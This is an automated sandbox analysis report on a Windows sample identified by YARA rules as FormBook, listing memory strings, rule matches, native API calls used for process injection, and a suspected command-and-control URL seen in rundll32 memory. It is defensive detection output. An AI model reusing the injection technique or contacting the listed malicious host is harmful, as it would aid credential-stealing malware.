          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: rundll32.exe, 00000006.00000002.483040430.0000000004C92000.00000004.00000001.sdmpString found in binary or memory: https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041825A NtReadFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A499D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A10 NtQuerySection,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A495F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49560 NtWriteFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A496D0 NtCreateKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49760 NtOpenProcess,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4A770 NtOpenThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_004182E0 NtClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041825A NtReadFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_004182DA NtClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041838B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB82E0 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB8260 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB8390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB82DA NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB825A NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B8B4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041C1CB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00401208
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041C3FC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041CB99
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00408C4B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00408C50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041C544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B611
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD20A8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B090
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD28EC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ADE824
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1002
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0F900
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD22AE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFA2B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3EBB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC03DA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACDBD2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD2B28
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1841F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACD466
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD25DD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A00D20
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD2D07
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD1D55
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD2EF7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A26E30
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACD616
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD1FF1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ADDFCE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B8B4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041C1CB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00401208
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041C3FC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041CB99
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00408C4B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00408C50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041C544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B611
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CD466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D1D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04600D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D2D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D25DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04626E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CD616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D2EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D1FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046DDFCE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046DE824
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D28EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D20A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D22AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D2B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C03DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBCB99
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC3FC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC1AF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC1CB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BA2FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BA8C50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BA8C4B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BA2D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: String function: 00419F60 appears 38 times
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: String function: 00A0B150 appears 45 times
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: String function: 0041A090 appears 40 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0460B150 appears 35 times
          Source: NdBLyH2h5d.exe, 00000000.00000003.211607404.000000001EF66000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe, 00000001.00000002.253177072.000000000264C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NdBLyH2h5d.exe
